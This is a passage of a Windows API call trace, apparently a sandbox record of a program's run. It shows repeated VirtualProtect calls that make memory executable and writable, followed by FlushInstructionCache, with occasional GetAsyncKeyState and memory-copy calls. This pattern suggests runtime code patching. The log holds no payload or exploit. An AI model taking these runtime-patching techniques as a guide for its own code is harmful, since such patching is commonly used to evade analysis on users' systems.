lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.177] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.177] GetCurrentProcess () returned 0xffffffff [0102.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.177] GetCurrentProcess () returned 0xffffffff [0102.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.177] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.178] GetCurrentProcess () returned 0xffffffff [0102.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.178] GetCurrentProcess () returned 0xffffffff [0102.178] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.178] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.179] GetCurrentProcess () returned 0xffffffff [0102.179] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.180] GetAsyncKeyState (vKey=3) returned 0 [0102.180] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.180] CRetailMalloc_Alloc () returned 0xc986a48 [0102.180] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.180] memcpy (in: _Dst=0xc986a68, _Src=0x197724, _Size=0x18 | out: _Dst=0xc986a68) returned 0xc986a68 [0102.180] CRetailMalloc_Realloc () returned 0xc986a48 [0102.180] CRetailMalloc_Free () returned 0x1 [0102.180] GetCurrentProcess () returned 0xffffffff [0102.180] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.180] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.181] GetCurrentProcess () returned 0xffffffff [0102.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.181] GetCurrentProcess () returned 0xffffffff [0102.181] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.181] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.182] GetCurrentProcess () returned 0xffffffff [0102.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.182] GetCurrentProcess () returned 0xffffffff [0102.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.182] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.182] GetCurrentProcess () returned 0xffffffff [0102.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.182] GetCurrentProcess () returned 0xffffffff [0102.182] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.182] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.183] GetCurrentProcess () returned 0xffffffff [0102.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.183] GetCurrentProcess () returned 0xffffffff [0102.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.183] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.184] GetCurrentProcess () returned 0xffffffff [0102.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.184] GetCurrentProcess () returned 0xffffffff [0102.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.184] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.184] GetCurrentProcess () returned 0xffffffff [0102.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.184] GetCurrentProcess () returned 0xffffffff [0102.184] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.184] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.185] GetCurrentProcess () returned 0xffffffff [0102.185] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.185] GetCurrentProcess () returned 0xffffffff [0102.185] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.185] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.186] GetCurrentProcess () returned 0xffffffff [0102.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.186] GetCurrentProcess () returned 0xffffffff [0102.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.186] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.186] GetCurrentProcess () returned 0xffffffff [0102.186] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.186] GetCurrentProcess () returned 0xffffffff [0102.187] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.187] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.187] GetCurrentProcess () returned 0xffffffff [0102.187] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.187] GetCurrentProcess () returned 0xffffffff [0102.187] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.187] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.188] GetCurrentProcess () returned 0xffffffff [0102.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.188] GetCurrentProcess () returned 0xffffffff [0102.188] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.188] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.191] GetCurrentProcess () returned 0xffffffff [0102.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.191] GetCurrentProcess () returned 0xffffffff [0102.191] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.191] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.192] GetCurrentProcess () returned 0xffffffff [0102.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.192] GetCurrentProcess () returned 0xffffffff [0102.192] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.192] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.193] GetCurrentProcess () returned 0xffffffff [0102.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.193] GetCurrentProcess () returned 0xffffffff [0102.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.193] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.193] GetCurrentProcess () returned 0xffffffff [0102.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.193] GetCurrentProcess () returned 0xffffffff [0102.193] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.193] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.194] GetCurrentProcess () returned 0xffffffff [0102.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.194] GetCurrentProcess () returned 0xffffffff [0102.194] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.194] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.195] GetCurrentProcess () returned 0xffffffff [0102.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.195] GetCurrentProcess () returned 0xffffffff [0102.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.195] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.195] GetCurrentProcess () returned 0xffffffff [0102.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.195] GetCurrentProcess () returned 0xffffffff [0102.195] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.195] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.196] GetCurrentProcess () returned 0xffffffff [0102.196] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.196] GetCurrentProcess () returned 0xffffffff [0102.196] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.196] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.197] GetCurrentProcess () returned 0xffffffff [0102.197] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.197] GetCurrentProcess () returned 0xffffffff [0102.197] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.197] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.197] GetCurrentProcess () returned 0xffffffff [0102.197] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.198] GetCurrentProcess () returned 0xffffffff [0102.198] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.198] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.198] GetCurrentProcess () returned 0xffffffff [0102.198] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.198] GetCurrentProcess () returned 0xffffffff [0102.198] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.198] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.199] GetCurrentProcess () returned 0xffffffff [0102.199] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.199] GetCurrentProcess () returned 0xffffffff [0102.199] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.199] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.199] GetCurrentProcess () returned 0xffffffff [0102.200] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.200] GetCurrentProcess () returned 0xffffffff [0102.200] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.200] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.200] GetCurrentProcess () returned 0xffffffff [0102.200] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.200] GetCurrentProcess () returned 0xffffffff [0102.200] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.200] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.201] GetCurrentProcess () returned 0xffffffff [0102.201] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.201] GetCurrentProcess () returned 0xffffffff [0102.201] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.201] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.202] GetCurrentProcess () returned 0xffffffff [0102.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.202] GetCurrentProcess () returned 0xffffffff [0102.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.202] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.202] GetCurrentProcess () returned 0xffffffff [0102.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.202] GetCurrentProcess () returned 0xffffffff [0102.202] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.202] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.203] GetCurrentProcess () returned 0xffffffff [0102.203] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.203] GetCurrentProcess () returned 0xffffffff [0102.203] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.203] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.204] GetCurrentProcess () returned 0xffffffff [0102.204] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.204] GetCurrentProcess () returned 0xffffffff [0102.204] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.204] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.205] GetCurrentProcess () returned 0xffffffff [0102.205] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.206] GetAsyncKeyState (vKey=3) returned 0 [0102.206] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.206] CRetailMalloc_Alloc () returned 0xc986aa8 [0102.206] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.206] memcpy (in: _Dst=0xc986ac8, _Src=0x197724, _Size=0x18 | out: _Dst=0xc986ac8) returned 0xc986ac8 [0102.206] CRetailMalloc_Realloc () returned 0xc986aa8 [0102.206] CRetailMalloc_Free () returned 0x1 [0102.206] GetCurrentProcess () returned 0xffffffff [0102.206] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.206] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.207] GetCurrentProcess () returned 0xffffffff [0102.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.207] GetCurrentProcess () returned 0xffffffff [0102.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.207] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.208] GetCurrentProcess () returned 0xffffffff [0102.208] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.208] GetCurrentProcess () returned 0xffffffff [0102.208] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.208] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.208] GetCurrentProcess () returned 0xffffffff [0102.208] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.208] GetCurrentProcess () returned 0xffffffff [0102.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.209] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.209] GetCurrentProcess () returned 0xffffffff [0102.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.209] GetCurrentProcess () returned 0xffffffff [0102.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.209] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.210] GetCurrentProcess () returned 0xffffffff [0102.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.210] GetCurrentProcess () returned 0xffffffff [0102.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.210] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.211] GetCurrentProcess () returned 0xffffffff [0102.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.211] GetCurrentProcess () returned 0xffffffff [0102.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.211] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.211] GetCurrentProcess () returned 0xffffffff [0102.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.212] GetCurrentProcess () returned 0xffffffff [0102.212] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.212] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.212] GetCurrentProcess () returned 0xffffffff [0102.212] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.212] GetCurrentProcess () returned 0xffffffff [0102.212] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.212] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.213] GetCurrentProcess () returned 0xffffffff [0102.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.213] GetCurrentProcess () returned 0xffffffff [0102.213] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.213] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.214] GetCurrentProcess () returned 0xffffffff [0102.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.214] GetCurrentProcess () returned 0xffffffff [0102.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.214] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.214] GetCurrentProcess () returned 0xffffffff [0102.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.214] GetCurrentProcess () returned 0xffffffff [0102.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.214] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.215] GetCurrentProcess () returned 0xffffffff [0102.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.215] GetCurrentProcess () returned 0xffffffff [0102.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.215] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.216] GetCurrentProcess () returned 0xffffffff [0102.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.216] GetCurrentProcess () returned 0xffffffff [0102.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.216] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.216] GetCurrentProcess () returned 0xffffffff [0102.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.216] GetCurrentProcess () returned 0xffffffff [0102.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.217] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.217] GetCurrentProcess () returned 0xffffffff [0102.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.217] GetCurrentProcess () returned 0xffffffff [0102.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.217] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.218] GetCurrentProcess () returned 0xffffffff [0102.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.218] GetCurrentProcess () returned 0xffffffff [0102.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.218] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.218] GetCurrentProcess () returned 0xffffffff [0102.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.219] GetCurrentProcess () returned 0xffffffff [0102.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.219] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.219] GetCurrentProcess () returned 0xffffffff [0102.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.219] GetCurrentProcess () returned 0xffffffff [0102.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.219] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.220] GetCurrentProcess () returned 0xffffffff [0102.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.221] GetCurrentProcess () returned 0xffffffff [0102.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.221] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.221] GetCurrentProcess () returned 0xffffffff [0102.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.221] GetCurrentProcess () returned 0xffffffff [0102.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.221] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.222] GetCurrentProcess () returned 0xffffffff [0102.222] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.222] GetCurrentProcess () returned 0xffffffff [0102.222] FlushInstructionCache 